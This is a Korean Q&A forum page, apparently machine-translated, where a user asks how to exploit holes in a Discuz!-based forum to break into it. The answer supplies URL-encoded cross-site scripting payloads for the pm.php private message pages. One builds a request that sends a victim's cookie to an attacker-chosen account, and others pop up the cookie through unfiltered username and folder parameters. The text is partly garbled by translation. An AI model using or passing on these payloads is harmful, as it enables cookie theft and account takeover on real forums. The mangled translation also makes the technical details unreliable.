컴퓨터 지식 네트워크 - 컴퓨터 사무실 - 현재 동왕포럼의 허점은 무엇인가요? 이러한 취약점을 어떻게 활용하여 동왕을 침공할 수 있을까요?

현재 동왕포럼의 허점은 무엇인가요? 이러한 취약점을 어떻게 활용하여 동왕을 침공할 수 있을까요?

디스커스에서! 게시물, 답글, PM 등의 제목은 필터링되지 않으므로 코드 추가도 가능합니다. 예:/forum/pm.php?action=send%22,false);var%20forms=%22pmSubmit=Submit%22.toLowerCase()%2B%22%26msgto=XXXXX%26subject=cookie%26saveoutbox=0%26message = %22%2Bescape(documents.cookie);Req.setRequestHeader(%22Content-length%22,forms.length)%3BReq.setRequestHeader(%22CONTENT-TYPE%22,%22application/x-www-form-urlencoded%22 ) ;Req.send(forms);%3c/script%3e%3cb%22 [ /img] discuz를 찾았습니다! 도메인 간 사이트의 UT 스크립트 취약점 - 도메인 간 사이트의 Short Message Chapter 스크립트 취약점은 매우 일반적인 취약점으로 간주됩니다. 특정 메시지에 대해서는 /phpbbs/pm.php?action=send&username=name 문을 참조하십시오. 그러나 필터링 없이 짧은 메시지를 보내는 페이지에 이름이 직접 표시되므로 쿠키 도용이나 더 심각한 피해의 문이 열립니다. . Discuz!3.X는 이 취약점을 방지하기 위해 /pm.php?action=send&uid=XXXX 유사한 문으로 변경되었지만 SMS 폴더를 선택할 때 필터링되지 않습니다. 위 취약점 example/phpbbs/pm.php?action=s...d&username=name %22%3E%3Cscript%3Ealert(documents.cookie)%3C/script%3E%3Cb%22[/URL] , 위 예를 들어 자신의 쿠키를 표시하는 것입니다. (Discus!1.X Discuz!2.X의 경우) /pm.php?folder=inbox%22%3E%3...script%3E%3Cb%22 자신만의 쿠키를 표시합니다. (디스커스를 위해! 3. 예시는 생략했습니다. (UT 포럼마다 코드가 다르지만 일반적으로 비슷한 취약점이 있음을 발견했습니다.)

채택을 희망합니다

上篇: 비악 짧은 비디오 실명 인증에 위험이 있습니까 下篇: 바이두 입력 방식에서 필기 연속 쓰기 기능을 활성화하는 방법
관련 내용